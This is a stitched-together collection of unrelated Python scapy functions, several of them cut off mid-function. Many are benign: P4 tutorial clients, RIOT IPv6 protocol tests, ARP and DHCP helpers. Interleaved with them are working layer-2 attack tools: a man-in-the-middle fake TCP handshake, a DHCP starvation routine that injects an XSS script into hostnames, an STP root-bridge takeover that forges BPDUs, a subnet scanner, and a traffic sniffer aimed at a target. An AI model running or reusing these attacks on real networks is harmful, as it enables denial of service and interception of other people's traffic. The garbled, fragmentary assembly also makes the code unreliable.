def main(): s = '' iface = 'eth0' print("Updating log table") for i in range(1, 100): pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4kway( type='U', k=i, v=round(math.log(i, 2) * 100)) pkt = pkt / ' ' # pkt.show() resp = srp1(pkt, iface=iface, timeout=1, verbose=False) print("Finish updating log table") while True: s = int(str(raw_input('> '))) if s == "quit": break print s try: pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4kway(k=s) pkt = pkt / ' ' # pkt.show() resp = srp1(pkt, iface=iface, timeout=1, verbose=False) if resp: p4kway = resp[P4kway] if p4kway: print('key={}, value={}, from_cache={}'.format( p4kway.k, p4kway.v, p4kway.cache)) else: print "cannot find P4aggregate header in the packet" else: print "Didn't receive response" except Exception as error: print 'error --> ' + error.message
def main(): p = make_seq(num_parser, make_seq(op_parser, num_parser)) s = '' iface = 'h1-eth0' while True: s = str(raw_input('> ')) if s == "quit": break print s try: i, ts = p(s, 0, []) pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc( op=ts[1].value, operand_a=datetime.datetime.now().time().microsecond, operand_b=int(ts[2].value)) pkt = pkt / ' ' # pkt.show() resp = srp1(pkt, iface=iface, timeout=1, verbose=False) if resp: p4calc = resp[P4calc] if p4calc: print p4calc.result #print(type(tob)) else: print "cannot find P4calc header in the packet" else: print "Didn't receive response" except Exception as error: print error
def test_task08(riot_ctrl, log_nodes): node = riot_ctrl(0, APP, Shell, port=TAP) host_netif = bridge(TAP) host_lladdr = get_link_local(host_netif) node_netifs = NETIF_PARSER.parse(node.ifconfig_list()) node_netif = next(iter(node_netifs)) node_hwaddr = node_netifs[node_netif]["hwaddr"] node_lladdr = [ addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"] if addr["scope"] == "link" ][0] ip_addr_add(host_netif, "beef::1/64") ip_route_add(host_netif, "affe::/64", node_lladdr) node.nib_route_add(node_netif, "beef::/64", host_lladdr) node.nib_route_add(node_netif, "affe::/64", "fe80::ab25:f123") pkt = srp1(Ether(dst=node_hwaddr) / IPv6(src="beef::1", dst="affe::1", hlim=1) / UDP(dport=48879), iface=host_netif, timeout=5, verbose=log_nodes) assert ICMPv6TimeExceeded in pkt assert pkt[ICMPv6TimeExceeded].code == 0 assert pkt[IPv6].src == node_lladdr
def test_task07(riot_ctrl, log_nodes): node = riot_ctrl(0, APP, Shell, cflags="-DCONFIG_GNRC_IPV6_NIB_SLAAC=1 " "-DCONFIG_GNRC_IPV6_NIB_QUEUE_PKT=1", termflags="-z [::]:17755", modules="socket_zep netdev_tap", port=TAP) host_netif = bridge(TAP) host_lladdr = get_link_local(host_netif) time.sleep(5) node_netifs = NETIF_PARSER.parse(node.ifconfig_list()) node_netif = [n for n in node_netifs if node_netifs[n]["mtu"] == 1500][0] fwd_netif = [n for n in node_netifs if node_netifs[n]["mtu"] < 1500][0] node_hwaddr = node_netifs[node_netif]["hwaddr"] node_lladdr = [ addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"] if addr["scope"] == "link" ][0] ip_addr_add(host_netif, "beef::1/64") ip_route_add(host_netif, "affe::/64", node_lladdr) node.nib_route_add(node_netif, "beef::/64", host_lladdr) node.nib_route_add(fwd_netif, "affe::/64", "fe80::ab25:f123") pkt = srp1(Ether(dst=node_hwaddr) / IPv6(src="beef::1", dst="affe::1") / UDP(dport=48879) / ("x" * 1452), iface=host_netif, timeout=5, verbose=log_nodes) assert ICMPv6PacketTooBig in pkt assert pkt[ICMPv6PacketTooBig].code == 0 assert node_netifs[fwd_netif]["mtu"] == pkt[ICMPv6PacketTooBig].mtu == 1280 assert pkt[IPv6].src == node_lladdr
def main(): s = '' iface = 'eth0' while s not in ['LFU', 'LRU']: s = str(raw_input('Type LFU or LRU> ')) if s == 'LFU': t = 'F' elif s == 'LRU': t = 'R' while True: s = int(str(raw_input('> '))) if s == "quit": break print s try: pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4kway(type=t, k=s) pkt = pkt / ' ' # pkt.show() resp = srp1(pkt, iface=iface, timeout=1, verbose=False) if resp: p4kway = resp[P4kway] if p4kway: print('key={}, value={}, from_cache={}'.format( p4kway.k, p4kway.v, p4kway.cache)) else: print "cannot find P4aggregate header in the packet" else: print "Didn't receive response" except Exception as error: print 'error --> ' + error.message
def traceroute_discovery(self): external_ip = requests.get("http://canhazip.com").text # getting external ip, to determine if cloud cluster cloud = HostDiscoveryHelpers.get_cloud(external_ip) from scapy.all import ICMP, IP, Ether, srp1 node_internal_ip = srp1(Ether() / IP(dst="google.com" , ttl=1) / ICMP(), verbose=0)[IP].src return [ [node_internal_ip,"24"], ], external_ip
def main(): p = make_seq(num_parser, make_seq(op_parser,num_parser)) s = '' iface = 'eth0' while True: s = str(input('> ')) if s == "quit": break print(s) try: i,ts = p(s,0,[]) print(f'ts is: {[t.value for t in ts]}') pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc(op=ts[1].value, operand_a=int(ts[0].value), operand_b=int(ts[2].value)) pkt = pkt/' ' pkt.show() resp = srp1(pkt, iface=iface, timeout=1, verbose=False) resp.show() if resp: p4calc=resp[P4calc] if p4calc: print((p4calc.result)) else: print("cannot find P4calc header in the packet") else: print("Didn't receive response") except Exception as error: print(error)
def doDhcp(mac): chmac = macToChaddr(mac) L2 = Ether(dst="ff:ff:ff:ff:ff:ff", src=mac) L3 = IP(src="0.0.0.0", dst="255.255.255.255") L4 = UDP(sport=68, dport=67) L5 = BOOTP(chaddr=chmac) L6 = DHCP(options=[("message-type","discover"),"end"]) resp = srp1(L2/L3/L4/L5/L6, filter="udp and port 68", timeout=5) try: srcIP = resp.yiaddr except AttributeError: print "Failed to acquire IP via DHCP for " + mac sys.exit(1) for x in resp.lastlayer().options: if(x == 'end'): break op,val = x if(op == "subnet_mask"): subnet_mask = val elif(op == 'server_id'): server_id = val L5 = BOOTP(chaddr=chmac, yiaddr=srcIP) L6 = DHCP(options=[("message-type","request"), ("server_id",server_id), ("subnet_mask",subnet_mask), ("requested_addr",srcIP), "end"]) sendp(L2/L3/L4/L5/L6) return srcIP
def test_hop_by_hop_opt_discard_unknown_5(child, iface, hw_dst, ll_dst, ll_src): # Register to hop-by-hop-option header register_protnum(child, EXT_HDR_NH[UDP]) p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrHopByHop(options=HBHOptUnknown( otype=TEST_OPTION_TYPES["ACTION_DISCARD_ERROR"], optlen=4, optdata="\x11\x22\x33\x44")) / UDP() / "\x01\x02", iface=iface, verbose=0, timeout=RECV_TIMEOUT) assert p is not None assert ICMPv6ParamProblem in p # unrecognized IPv6 option encountered assert p[ICMPv6ParamProblem].code == 2 # first after IPv6 header + extension header => 40 + 2 = 42 assert p[ICMPv6ParamProblem].ptr == 42 res = child.expect( # the packet should be not received at all [r"PKTDUMP: data received:", TIMEOUT], timeout=RECV_TIMEOUT) assert res > 0 pktbuf_empty(child) unregister(child)
def test_task09(riot_ctrl, log_nodes): node = riot_ctrl(0, APP, Shell, port=TAP) host_netif = bridge(TAP) host_lladdr = get_link_local(host_netif) node_netifs = NETIF_PARSER.parse(node.ifconfig_list()) node_netif = next(iter(node_netifs)) node_hwaddr = node_netifs[node_netif]["hwaddr"] node_lladdr = [ addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"] if addr["scope"] == "link" ][0] ip_addr_add(host_netif, "beef::1/64") ip_route_add(host_netif, "affe::/64", node_lladdr) node.nib_route_add(node_netif, "beef::/64", host_lladdr) node.nib_route_add(node_netif, "affe::/64", "fe80::ab25:f123") pkt = srp1(Ether(dst=node_hwaddr) / IPv6(src="beef::1", dst="affe::1", plen=20) / UDP(dport=48879), iface=host_netif, timeout=5, verbose=log_nodes) assert ICMPv6ParamProblem in pkt assert pkt[ICMPv6ParamProblem].code == 0 err_bytes = raw(pkt[IPerror6]) ptr = pkt[ICMPv6ParamProblem].ptr # plen is a 2 byte field in network byte order (big endian) ptr_val = (err_bytes[ptr] << 8) | err_bytes[ptr + 1] assert ptr_val == 20 assert pkt[IPv6].src == node_lladdr
def main(): p = make_seq(num_parser, make_seq(op_parser, num_parser)) s = '' while True: s = str(raw_input('> ')) if s == "quit": break try: i, ts = p(s, 0, []) pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc( op=ts[1].value, operand_a=int(ts[0].value), operand_b=int(ts[2].value)) pkt = pkt / ' ' # pkt.show() resp = srp1(pkt, timeout=1, verbose=False) if resp: p4calc = resp[P4calc] if p4calc: print '%s = %d' % (s, p4calc.result) else: print "cannot find P4calc header in the packet" else: print "Didn't receive response" except Exception as error: print error
def main(): p = make_seq(num_parser, make_seq(op_parser,num_parser)) s = '' iface = 'h1-eth0' while True: s = str(raw_input('> ')) if s == "quit": break print s try: i,ts = p(s,0,[]) pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc(op=ts[1].value, operand_a=int(ts[0].value), operand_b=int(ts[2].value)) #pkt.show() resp = srp1(pkt, iface=iface, timeout=1, verbose=False) if resp: p4calc=resp[P4calc] if p4calc: print p4calc.result else: print "cannot find P4calc header in the packet" else: print "Didn't receive response" except Exception as error: print error
def ICMP_scan(self, ip): try: if "/24" in ip: new_ip = ip.split(".") for i in range(1, 100): threading.Thread( target=self.ICMP_scan, args=(new_ip[0] + "." + new_ip[1] + "." + new_ip[2] + "." + str(i), )).start() time.sleep(1) for i in range(100, 255): threading.Thread( target=self.ICMP_scan, args=(new_ip[0] + "." + new_ip[1] + "." + new_ip[2] + "." + str(i), )).start() time.sleep(1) else: icmp_packet = scapy.Ether() / scapy.IP(dst=ip) / scapy.ICMP() answered = scapy.srp1(icmp_packet, timeout=int(self.time), verbose=False)[0] client_dict = { "ip": answered[scapy.IP].src, "mac": answered[scapy.Ether].src, "Ver": str(answered[scapy.IP].version) } #answered[scapy.IP].version self.client_list_ICMP.append(client_dict) except TypeError: pass
def getMAC(ip): pkt = Ether() / ARP(op=ARP.who_has, pdst=ip) ans = srp1(pkt, verbose=False, timeout=10) if ans[ARP] and ans[ARP].hwsrc: return ans[ARP].hwsrc else: return None
def ARPRequest(ipaddr, timeout=0.1): ether = Ether(dst="ff:ff:ff:ff:ff:ff") arp = ARP(pdst=ipaddr) ans = srp1(ether / arp, timeout=timeout, verbose=False) if not ans: return None return ans.src
def icmp_test(dst_mac, ip, iface): '''发送ICMP报文验证是否可达''' packet = Ether(dst=dst_mac) / IP(dst=ip) / ICMP() response = srp1(packet, timeout=2, iface=iface) if response.haslayer(IP): if response[IP].src == ip: return True return False
def traceroute_discovery(self): external_ip = requests.get("http://canhazip.com", timeout=5).text # getting external ip, to determine if cloud cluster cloud = HostDiscoveryHelpers.get_cloud(external_ip) logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # disables scapy's warnings from scapy.all import ICMP, IP, Ether, srp1 node_internal_ip = srp1(Ether() / IP(dst="google.com" , ttl=1) / ICMP(), verbose=0)[IP].src return [ [node_internal_ip,"24"], ], external_ip
def _mitm_tcp_handshake(self, syn): """make fake tcp handshake, client would believe it is handshaking with http server, but it is the attacker who responses""" l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / IP( src=self.http_ip, dst=self.client_ip) syn_ack = TCP( dport=syn[TCP].sport, sport=syn[TCP].dport, flags="SA", seq=self.seq, ack=syn.seq + 1, ) r = srp1(l2_l3 / syn_ack, verbose=False) counter = 0 while r.ack != self.seq + 1 and counter < 5: counter += 1 r = srp1(l2_l3 / syn_ack, timeout=1, verbose=False)
def traceroute_discovery(self): config = get_config() node_internal_ip = srp1( Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout, )[IP].src return [[node_internal_ip, "24"]]
def traceroute_discovery(self): external_ip = requests.get("http://canhazip.com").text # getting external ip, to determine if cloud cluster cloud = self.get_cloud(external_ip) logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # disables scapy's warnings from scapy.all import ICMP, IP, Ether, srp1 node_internal_ip = srp1(Ether() / IP(dst="google.com" , ttl=1) / ICMP(), verbose=0)[IP].src for ip in self.generate_subnet(ip=node_internal_ip, sn="24"): self.publish_event(NewHostEvent(host=ip, cloud=external_ip))
def test_time_exc(child, iface, hw_dst, ll_dst, ll_src): dummy = "affe::1" p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, hlim=1, src=ll_src) / IPv6ExtHdrRouting(type=3, segleft=1, addresses=[dummy]), iface=iface, timeout=1, verbose=0) assert(p is not None) assert(ICMPv6TimeExceeded in p) assert(p[ICMPv6TimeExceeded].code == 0) pktbuf_empty(child)
def arp_request(target_ip: str): mac = srp1( # dst="ff:ff:ff:ff:ff:ff" broadcasts the request to the whole network Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff"), timeout=.5, verbose=0, ) return mac # None if unresolved
def test_wrong_type(child, iface, hw_dst, ll_dst, ll_src): p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrRouting(type=255, segleft=1, addresses=["abcd::1"]), iface=iface, timeout=1, verbose=0) assert(p is not None) assert(ICMPv6ParamProblem in p) assert(p[ICMPv6ParamProblem].code == 0) # erroneous header field encountered assert(p[ICMPv6ParamProblem].ptr == 42) # routing header type field pktbuf_empty(child)
def get_dhcp_offer(interface_name): conf.checkIPaddr=False # Select correct interface. interface = interface_name localmac = get_if_hwaddr(interface) # Create DHCP DISCOVER packet dhcp_discover = Ether(src=localmac, dst='ff:ff:ff:ff:ff:ff')/IP(src='0.0.0.0', dst='255.255.255.255')/UDP(dport=67, sport=68)/BOOTP(chaddr="8c859039f517",xid=RandInt())/DHCP(options=[('message-type', 'discover'), 'end']) # Send DISCOVER packet and wait for OFFER packet. dhcp_offer = srp1(dhcp_discover,iface=interface, verbose=False) return dhcp_offer
def test_multicast_addr(child, iface, hw_dst, ll_dst, ll_src): # Send routing header with multicast address in its destinations p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrRouting(type=3, segleft=1, addresses=["ff02::1"]), iface=iface, timeout=1, verbose=0) assert(p is not None) assert(ICMPv6ParamProblem in p) assert(p[ICMPv6ParamProblem].code == 0) # erroneous header field encountered assert(p[ICMPv6ParamProblem].ptr == 48) # first address in routing header pktbuf_empty(child)
def _get_mac_by_ip(self, target_ip): """get mac address of an IP by arp query """ ether = Ether(src=self.attacker_mac, dst="ff:ff:ff:ff:ff:ff" ) # ff:ff:ff:ff:ff:ff is the addr for broadcast arp_packet = ARP(op=1, hwsrc=self.attacker_mac, psrc=self.attacker_ip, pdst=target_ip) arp_response = srp1(ether / arp_packet, verbose=False) return arp_response.src
def traceroute_discovery(self): # getting external ip, to determine if cloud cluster external_ip = requests.get("https://canhazip.com", timeout=config.network_timeout).text from scapy.all import ICMP, IP, Ether, srp1 node_internal_ip = srp1(Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].src return [[node_internal_ip, "24"]], external_ip
def dnsv6_request(nameserver, domain_name, iface): transaction_id = 0x3d3d payload = Ether(dst="cc:d5:39:dc:01:c1") payload /= IPv6(dst=nameserver) payload /= UDP(sport=47516, dport=53) payload /= DNS(id=transaction_id, rd=1, qd=DNSQR(qname=domain_name, qtype='AAAA')) return srp1(payload, verbose=True, iface=iface)
def test_it(self): self.taploop.start() time.sleep(0.25) iface = self.taploop.get_iface() ans = srp1(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(psrc=self.lhost, pdst=self.rhost), filter="arp and arp[7] = 2", iface=iface, timeout=0.5) arpp = ans.getlayer(ARP) self.assertEquals(arpp.psrc, self.rhost) self.assertEquals(arpp.pdst, self.lhost)
def test_empty_duplicate_hop_by_hop_opt(child, iface, hw_dst, ll_dst, ll_src): # Try sending two empty hop-by-hop-option header p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrHopByHop() / IPv6ExtHdrHopByHop() / UDP() / "\x03\x04", iface=iface, timeout=1, verbose=0) # should return parameter problem message assert(p is not None) assert(ICMPv6ParamProblem in p) assert(p[ICMPv6ParamProblem].code == 1) # unrecognized next header assert(p[ICMPv6ParamProblem].ptr >= 40) # after IPv6 header pktbuf_empty(child)
def arp_scan(target): for ipFix in range(2, 255): ip = "192.168.11." + str(ipFix) arpPkt = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP( pdst=ip, hwdst="ff:ff:ff:ff:ff:ff") res = srp1(arpPkt, timeout=1, verbose=0) if res: for device in target.devices: if res.hwsrc == device.mac_addr: device.ip_addr = res.psrc target.update(device, online=True)
def test_time_exc(child, iface, hw_dst, ll_dst, ll_src): dummy = "affe::1" p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, hlim=1, src=ll_src) / IPv6ExtHdrRouting(type=3, segleft=1, addresses=[dummy]), iface=iface, timeout=1, verbose=0) assert (p is not None) assert (ICMPv6TimeExceeded in p) assert (p[ICMPv6TimeExceeded].code == 0) pktbuf_empty(child)
def gen_external_frames(interface: str, ip: str, ports: Union[list, tuple], gateway: str) -> List[Ether]: """ Generates external frames. Throws ARPError if gateway is down """ arp_resp = srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=gateway), timeout=5, iface=interface, verbose=0) if not arp_resp: raise ARPError( f"Unable to find MAC for gateway IP {gateway}. Is it up?") return [Ether(dst=arp_resp[ARP].hwsrc) / IP(dst=ip)]
def test_seg_left_gt_len_addresses(child, iface, hw_dst, ll_dst, ll_src): # send routing header with no (0) addresses but segleft set to a value # larger than 0 p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrRouting(type=3, segleft=18, addresses=[]), iface=iface, timeout=1, verbose=0) assert(p is not None) assert(ICMPv6ParamProblem in p) assert(p[ICMPv6ParamProblem].code == 0) # erroneous header field encountered assert(p[ICMPv6ParamProblem].ptr == 43) # segleft field pktbuf_empty(child)
def run(self): count = 0 while True: count += 1 if (self.max_count > 0) and (count > self.max_count): break disco_pkt = dhcp_discover_pkt(self.mac, self.hostname) disco_reply = srp1(disco_pkt, iface=self.iface, verbose=False) request_pkt = dhcp_request_pkt(disco_reply, self.hostname) request_reply = srp1(request_pkt, iface=self.iface, verbose=False) if is_dhcp_ack(request_reply): my_ip = request_reply[BOOTP].yiaddr if my_ip not in self.obtained_ips: self.obtained_ips.append(my_ip) print('got new IP for client %s: %s' % (self.mac, my_ip)) release_pkt = dhcp_release_pkt(request_reply, self.hostname) if self.timeout > 0: time.sleep(self.timeout) sendp(release_pkt, iface=self.iface, verbose=False) print('client %s obtained IPs: %s' % (self.hostname, ' '.join(self.obtained_ips)))
def test_wrong_type(child, iface, hw_dst, ll_dst, ll_src): p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrRouting(type=255, segleft=1, addresses=["abcd::1"]), iface=iface, timeout=1, verbose=0) assert (p is not None) assert (ICMPv6ParamProblem in p) assert (p[ICMPv6ParamProblem].code == 0 ) # erroneous header field encountered assert (p[ICMPv6ParamProblem].ptr == 42) # routing header type field pktbuf_empty(child)
def get_kube_dns_ip_mac(self): kubedns_svc_ip = self.extract_nameserver_ip() # getting actual pod ip of kube-dns service, by comparing the src mac of a dns response and arp scanning. dns_info_res = srp1(Ether() / IP(dst=kubedns_svc_ip) / UDP(dport=53) / DNS(rd=1,qd=DNSQR()), verbose=0) kubedns_pod_mac = dns_info_res.src self_ip = dns_info_res[IP].dst arp_responses, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst="{}/24".format(self_ip)), timeout=3, verbose=0) for _, response in arp_responses: if response[Ether].src == kubedns_pod_mac: return response[ARP].psrc, response.src
def is_DHCP(pkt): global src_mac global xi global follow global inter if DHCP in pkt: if pkt[BOOTP].op == 2: ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac, type=0x800) ip = IP(src="0.0.0.0", dst="255.255.255.255", id=0x00, tos=0x10) udp = UDP(sport=68, dport=67) res = src_mac.split(":") ch = "" for i in res: ch = ch + chr(int(i, 16)) host = xss bootps = BOOTP(xid=int(xi, 16), ciaddr='0.0.0.0', chaddr=ch) ipServer = pkt[IP].src ipCliente = pkt[BOOTP].yiaddr dhcps = DHCP( options=[("message-type", "request"), ( "server_id", ipServer), ("requested_addr", ipCliente), ("hostname", host), ("param_req_list", chr(scapy.all.DHCPRevOptions["subnet_mask"][0]), chr(scapy.all.DHCPRevOptions["router"][0]), chr(scapy.all.DHCPRevOptions["name_server"][0]), chr(15)), "end"]) packet = ethernet / ip / udp / bootps / dhcps pkt = srp1(packet, iface=inter, verbose=1) if DHCP in pkt: print pkt.summary() for x in pkt[DHCP].options: if x[0] == "router": gateway = x[1] elif x[0] == "subnet_mask": netmask = x[1] elif x[0] == "name_server": servername = x[1] elif x[0] == "message-type": messageType = x[1] if messageType == 5: os.system("ifconfig " + inter + " " + ipCliente + " netmask " + netmask) os.system("cp /etc/resolv.conf /etc/resolv.conf.old") os.system("echo nameserver " + servername + " > /etc/resolv.conf") os.system("ip route add default via " + gateway + " dev " + inter) follow = True
def arp_broadcast(srcmac, psrc, pdst, iface, timeout): ether_layer = Ether(src=srcmac, dst='ff:ff:ff:ff:ff:ff') arp_layer = ARP(op=1, hwsrc=srcmac, psrc=psrc, pdst=pdst) request = ether_layer / arp_layer f = ( 'ether dst %s and ' % srcmac + 'arp and ' + 'arp[6:2] = 0x0002 and ' + # op: is-at(2) 'arp[14:4] = 0x%x and ' % IPAddress(pdst) + # psrc 'arp[24:4] = 0x%x' % IPAddress(psrc)) # pdst conf.iface = iface reply = srp1(request, iface=iface, filter=f, timeout=timeout, verbose=0) return reply
def test_multiple_addrs_of_mine_uncomp(child, iface, hw_dst, ll_dst, ll_src): dummy = "affe::1" # add dummy IPv6 address dst_iface = get_first_interface(child) add_ipv6_address(child, dst_iface, dummy) p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrRouting(type=3, segleft=3, addresses=[ll_dst, ll_src, dummy]), iface=iface, timeout=1, verbose=0) assert(p is not None) assert(ICMPv6ParamProblem in p) assert(p[ICMPv6ParamProblem].code == 0) # erroneous header field encountered assert(p[ICMPv6ParamProblem].ptr == 40+8+(2 * 16)) # dummy in routing header pktbuf_empty(child) del_ipv6_address(child, dst_iface, dummy)
def is_DHCP(pkt): global src_mac global xi global follow global inter if DHCP in pkt: if pkt[BOOTP].op == 2: ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac, type=0x800) ip = IP(src="0.0.0.0", dst="255.255.255.255",id=0x00,tos=0x10) udp = UDP(sport=68, dport=67) res = src_mac.split(":") ch="" for i in res: ch=ch + chr(int(i,16)) host = xss bootps = BOOTP(xid=int(xi,16), ciaddr='0.0.0.0',chaddr=ch) ipServer = pkt[IP].src ipCliente = pkt[BOOTP].yiaddr dhcps = DHCP(options=[("message-type", "request"),("server_id",ipServer),("requested_addr", ipCliente), ("hostname",host), ("param_req_list", chr(scapy.all.DHCPRevOptions["subnet_mask"][0]), chr(scapy.all.DHCPRevOptions["router"][0]), chr(scapy.all.DHCPRevOptions["name_server"][0]), chr(15)), "end"]) packet = ethernet / ip / udp / bootps / dhcps pkt=srp1(packet, iface=inter, verbose=1) if DHCP in pkt: print pkt.summary() for x in pkt[DHCP].options: if x[0] == "router": gateway = x[1] elif x[0] == "subnet_mask": netmask = x[1] elif x[0] == "name_server": servername = x[1] elif x[0] == "message-type": messageType = x[1] if messageType == 5: os.system("ifconfig "+inter+" "+ipCliente+" netmask "+netmask) os.system("cp /etc/resolv.conf /etc/resolv.conf.old") os.system("echo nameserver "+servername+" > /etc/resolv.conf") os.system("ip route add default via "+gateway+" dev "+inter) follow=True
def run(interface,xs): """ This function launch DHCP DISCOVER DOS attack :param inter: interface to be launched the attack :type inter: str """ global src_mac global xi global follow global inter follow=False #if len(interface) > 0: inter = interface if xs == "": xss="<script>alert('hola')</script>" else: xss=xs try: src_mac= get_if_hwaddr(inter) print str(src_mac) ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=str(src_mac), type=0x800) ip = IP(src="0.0.0.0", dst="255.255.255.255") udp = UDP(sport=68, dport=67) while not follow: xi = RandString(8, "1234567890abcdef") xi = "0x"+str(xi) res = src_mac.split(":") ch="" for i in res: ch=ch + chr(int(i,16)) bootps = BOOTP(xid=int(xi,16), ciaddr='0.0.0.0',chaddr=ch) host = "<script>alert('hola')</script>" dhcps = DHCP(options=[("message-type", "discover"),("hostname",host), "end"]) packet = ethernet / ip / udp / bootps / dhcps conf.checkIPaddr = False pkt=srp1(packet, iface=inter, verbose=1) if BOOTP in pkt: is_DHCP(pkt) #sniff(prn=is_DHCP, filter="udp and (port 67 or 68)", iface=inter except KeyboardInterrupt: pass
def discoverMACOf(addr): r=srp1(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=addr), timeout=2) if r!=None: return str(r[Ether].src) else: return ""
def run(interface): """ This function launch STP ROOT ROLE ATTACK :param interface: interface to be launched the attack :type interface: str """ # sniff to found a stp packet pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface) # Look for a STP packet to use a lower priority pk_list={x:y for x,y in pkt.sessions().iteritems() if "Other" in x} item=pk_list.popitem() pkts = item[1] for x in pkts: if STP in x: STP_packet = x break #myMAC = get_if_hwaddr(interface) #root_id = STP_packet.rootid - 1 #bridge_id = STP_packet.bridgeid - 1 rootMAC = STP_packet.rootmac bridgeMAC =STP_packet.bridgemac aux=False newMAC='' rootMAC=rootMAC[::-1] for x in range(len(rootMAC)): if (rootMAC[x] in '123456789abcdef') and not aux: n=int(rootMAC[x], 16) n-=1 n=format(n, 'x') newMAC+=n aux=True else: newMAC+=rootMAC[x] rootMAC=newMAC[::-1] newMAC='' aux=False bridgeMAC=bridgeMAC[::-1] for x in range(len(bridgeMAC)): if (bridgeMAC[x] in '123456789abcdef') and not aux: n=int(bridgeMAC[x], 16) n-=1 n=format(n, 'x') newMAC+=n aux=True else: newMAC+=bridgeMAC[x] bridgeMAC=newMAC[::-1] #brigdemac root_id = STP_packet.rootid bridge_id = STP_packet.bridgeid p_ether = Dot3(dst="01:80:c2:00:00:00", src=bridgeMAC) p_llc = LLC() p_stp = STP(bpdutype=0x00, bpduflags=0x01, portid=0x8002, rootmac=rootMAC, bridgemac=bridgeMAC, rootid=root_id, bridgeid=bridge_id) pkt = p_ether/p_llc/p_stp # STP packet structure try: while 1: pkt_sniff=srp1(pkt, iface=interface, verbose=0, timeout=2) if pkt_sniff is not None: if STP in pkt_sniff: if pkt_sniff[Dot3].src!=rootMAC: p_stp_ack=STP(bpdutype=0x00, bpduflags=0x81, portid=0x8002, rootmac=rootMAC, bridgemac=bridgeMAC, rootid=root_id, bridgeid=bridge_id) pkt_ack= p_ether/p_llc/p_stp_ack sendp(pkt_ack, iface=interface, verbose=0) except KeyboardInterrupt: pass
def arping(mac, ip, timeout): """Arping function takes IP Address or Network, returns nested mac/ip list""" for i in range(timeout/2): ans = srp1(Ether(dst=mac)/ARP(pdst=ip), timeout=2, verbose=0) if ans: break return ans
self.user_agents = {} def listen(self, pkt): if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP): if pkt[IP].src == target and "User-Agent:" in pkt[Raw].load: pkt[Raw].load = pkt[Raw].load[pkt[Raw].load.find("User-Agent:"):] if pkt[IP].src not in self.user_agents.keys(): self.user_agents[pkt[IP].src] = pkt[Raw].load[:pkt[Raw].load.find("\n")] print "%s -- User Agent:\n%s\n" % (target, self.user_agents[pkt[IP].src]) def run(self): sniff(prn = self.listen, filter="port 80") try: target = str(raw_input("Target \\\: ")) if not "." in target: exit() if target == my_ip: exit("You cant set the Target to Your IP\nYou " + my_ip + " Target " + target) try: ans = srp1(Ether(src=my_mac)/IP(src=my_ip, dst=target)/ICMP(type=8), timeout=5) if ans: target_mac = ans[Ether].src except Exception as prblm: exit(prblm) if not target_mac: try: ans, unans = srp(Ether()/ARP(op=1, psrc=my_ip, pdst=target), timeout=5) if len(ans) == 0: print "Looks like %s is Inactive or not Online" % target target_mac = str(raw_input("Target Mac-Address \\\: ")) else: target_mac = ans[0][1].src except Exception as resolv_prblm: exit(resolv_prblm)